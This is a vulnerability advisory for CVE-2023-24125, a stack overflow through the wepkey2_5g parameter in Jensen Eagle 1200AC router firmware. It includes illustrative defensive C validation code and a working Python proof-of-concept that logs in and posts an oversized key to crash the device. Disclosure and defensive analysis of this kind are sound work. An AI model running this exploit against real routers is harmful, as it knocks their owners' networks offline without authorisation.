CVE-2023-24125: DoS via wepkey2_5g parameter in Eagle 1200ac


Description

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet.

Additional information

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey2_5g is stored into wl5g.extra.wep_key2 via SetValue.

When /goform/WifiBasicGet (formWifiBasicGet) is then called, the string is loaded from wl5g.extra.wep_key2 and copied into the stack buffer wifi_buf_entry. Because the length of wepkey2_5g is never checked, a large string overflows the stack buffer.
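The flow described above has two places where a length check belongs: when the key is stored and when it is copied back into a fixed-size buffer. The following C code is an added example, not the firmware's code or the advisory author's; the function names, the 64-byte buffer size and the WEP length rule applied (5 or 13 ASCII characters, or 10 or 26 hex digits) are assumptions for illustration.

```c
#include <ctype.h>
#include <string.h>

#define WIFI_BUF_ENTRY_LEN 64  /* assumed: the advisory gives no real size */

/* Length of s, scanning at most max bytes. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Set side (hypothetical check for the WifiBasicSet step): accept only
 * well-formed WEP keys, i.e. 5 or 13 printable ASCII characters or
 * 10 or 26 hex digits. Returns 1 if valid, 0 otherwise. */
int wep_key_is_valid(const char *key)
{
    if (key == NULL)
        return 0;
    size_t n = bounded_len(key, 27);   /* 27 = longest legal key + 1 */
    int hex = (n == 10 || n == 26);
    if (!hex && n != 5 && n != 13)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)key[i];
        if (hex ? !isxdigit(c) : !(c >= 0x20 && c <= 0x7e))
            return 0;
    }
    return 1;
}

/* Get side (hypothetical copy for the WifiBasicGet step): copy a stored
 * value into a fixed-size buffer. Returns 0 on success, or -1 with dst
 * left empty when the value does not fit. */
int copy_config_value(char *dst, size_t dst_len, const char *stored)
{
    if (dst == NULL || dst_len == 0)
        return -1;
    dst[0] = '\0';
    if (stored == NULL)
        return -1;
    size_t n = bounded_len(stored, dst_len);
    if (n >= dst_len)                  /* no room for the terminator */
        return -1;
    memcpy(dst, stored, n + 1);        /* n + 1 copies the terminator too */
    return 0;
}
```

Either check alone stops the oversized value; applying both means a value already stored in the configuration cannot overflow the buffer on read.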

PoC script:

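import requests

# Address of the router under test
IP = "192.168.38.1"

# Credentials posted to the login endpoint
logindata = {
    "username": "admin",
    "password": "81dc9bdb52d04dc20036dbd8313ed055",
}

def login():
    # Retry the login up to 10 times and return the "password" cookie
    for i in range(10):
        session = requests.Session()
        session.post(f"http://{IP}/login/Auth", data=logindata)
        try:
            return session.cookies["password"]
        except KeyError:
            # Cookie not set on this attempt; try again
            pass

# Authenticated session reused for both requests
session = requests.Session()
session.cookies.set("password", login())

# Step 1: store an oversized wepkey2_5g value via WifiBasicSet
payload = {
    "wepkey2_5g": "A" * 0x1000,
    "security": "wep",
}
res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
print(res.status_code)

# Step 2: WifiBasicGet reads the stored value back into the stack buffer
res = session.post(f"http://{IP}/goform/WifiBasicGet")
print(res.text)
print(res)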
